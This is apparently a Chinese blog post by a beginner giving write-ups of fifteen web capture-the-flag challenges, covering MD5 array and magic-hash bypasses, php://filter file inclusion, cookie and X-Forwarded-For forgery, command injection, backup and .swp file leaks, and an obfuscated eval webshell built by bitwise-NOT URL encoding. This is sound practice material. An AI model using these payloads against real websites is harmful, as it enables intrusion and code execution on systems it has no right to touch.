题分布的比较乱,请各位别介意
第一次做文章,有哪些不足的地方请指出来,让我改进一下,谢谢大家了!!
前三个为bugkuCTF的题
1,前女友
打开题目链接
首先,查看源代码看看是否藏着flag
发现了code.txt,打开看看里面有啥东西
打开发现是一对代码,尝试进行解析
解析可得出:v1不能等于v2,但是md5要相等,并且v3要等于flag,满足这几个条件就可以获取flag,于是进行尝试
payload:?v1[]=1&v2[]=2&v3[]=3
得到了flag!
2,文件包含
打开网站,出现click me?,点击试一试
打开后发现了index.php,上面URL出现了?file=show.php
试试?file=index.php
,不过好像不太行
文件包含可以是用php伪协议进行,于是尝试利用php伪协议看看能否打开网页
伪造payload:/?file=php://filter/read=convert.base64-encode/resource=show.php
得到了base64加密的东西,进行base64解码,得到其为index.php
将payload修改为:/?file=php://filter/read=convert.base64-encode/resource=index.php
得到了一长串的base64加密的代码,进行解码得到了藏在注释里的flag
3,MD5
打开网页后发现要求我们输入a
F12查看源代码,结果什么也没有,查看他人的wp得到了相关的源码
对代码进行解析,得到是用一个加密之后是 0e 开头的数字,并且两个md5值必须相等就可以绕过限制了
payload:/?a=s878926199a
对于此题搜集了一些关于MD5碰撞字符的一些内容
下面四个为buuctf的题
4,Futurella
打开题目链接,看见一张图片
F12查看源代码,发现flag藏在源代码里
5,Kookie
打开题目链接,提示我们用admin这个用户名登陆,然而用admin登陆是显示账号或密码错误,尝试使用cookie这个用户名登陆,
用bp抓包将cookie修改为admin
将cookie值修改为admin后,出现了flag
6,PYWebsite
开启题目后,得到了一个这样的网页
F12查看源代码后,在js里发现了/flag.php,尝试打开
由上述内容得,要求我们伪造XFF的IP地址,才可以看到flag
添加XFF后得到了flag
7,RCE ME
开启题目后,发现了php代码,进行代码审计
审计后,发现要求我们传的payload中不能含有大小写字母和数字,因此可以使用异或绕过或者是url编码取反绕过,进行下一步操作
先查看phpinfo内有哪些禁用函数,对phpinfo进行url编码取反得到:?code=(~%8F%97%8F%96%91%99%90)();
发现disable_functions函数内有许多禁用的函数
查看wp,得到一个shell
shell:
<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[1]))';
$d=urlencode(~$c);
echo $d;
?>
%9E%8C%8C%9A%8D%8B<br>%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6
将其输入到url后,得到了url编码取反的一串代码:?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9D%86%8F%9E%8C%8C%A2%D6%D6);
因此payload为:?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9D%86%8F%9E%8C%8C%A2%D6%D6);
用蚁剑连接查看
直接打开/flag,后没有发现任何东西,想到之前phpinfo内禁用的一堆函数,也是理所应当了
利用一个插件,可以得到flag
插件:
加载插件:
选择模式:
在命令行内输入/readflag,得到flag
这个是nssctf题
8,寻找蛛丝马迹
打开题目链接,F12查看源代码,在head里发现了第一段flag
在styles.css里发现了第二段flag
在script.js里发现了第三段flag
提示不想让谷歌搜到他的网站,尝试robots.txt
得到了一串乱码,利用火狐的修复文字编码,对上述文本修复,得到了第四段flag
和苹果有关系联想到.DS_store,得到第五段flag
由提示得是一个备份文件,想到www.zip,得到最后一段flag
综上所述,flag为:FSCTF{Tell_y0U_noT_To_poInT_oUt_tH@t_y000u_Don't_believe_it!}
下面六道为catf1ag网站的题
9,GET&POST
开启题目后,得到这样一个页面
提示用GET方式传入flag=cat
payload:?flag=cat
提示用POST方式传入flag=flag,利用bp抓包尝试
注意传入的是flag=f1ag,而不是flag!!!
10,robot
开启题目后,提示notflag,由此可得payload可为:/robots.txt
跳转后得到了一个两个文件
下载第一个文件,打开即可得到flag
11, intval
开启题目,点击题目链接,得到一个php文本
进行代码审计,要求我们传入num值,
尝试payload:/?num=123
说明payload错误了,尝试加入一个字母
payload:/?num=123a
得到了flag
12,rce_me_1
打开链接要求我们对cmd传入一个值
简单的rce题,进行基础的查目录payload:/?cmd=ls
得到了get_flag_in_there_!!!!!!!!!!!!!!!!!!!这个文件,利用cat命令打开
得到了flag
13,easy_include_1
点击链接
得到了index.php,直接打开后页面出现了满屏的/?file=index.php,奇奇怪怪的
F12查看源代码后发现了flag在/get_flag里
利用php伪协议打开此文件,
伪造payload为:?file=php://filter/read=convert.base64-encode/resource=/get_flag
得到了一串base64编码的字符,将其进行解码,这里推荐使用CyberChef
14,easy_include_2
打开题目链接后,被狠狠的 抽象到了,F12查看源代码,看看flag是否藏在里面
在源代码里找到了一个flag,可惜的是这个flag是假的
继续向下找flag,在最后找到了file=,猜想使用php伪协议
伪造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
进行尝试
提示不用加php后缀所以payload:?file=php://filter/read=convert.base64-encode/resource=flag
得到了一串base64加密的字符,进行解码
得到了flag
注意要将catf1ag改为flag,才是正确答案!!
15,swp
由题目可知此题跟swp有关
在linux里vi/vim异常关闭会保留一个.swp文件,访问.index.php.swp,可以得到flag
由文字提示,正好满足条件,访问.index.php.swp
得到flag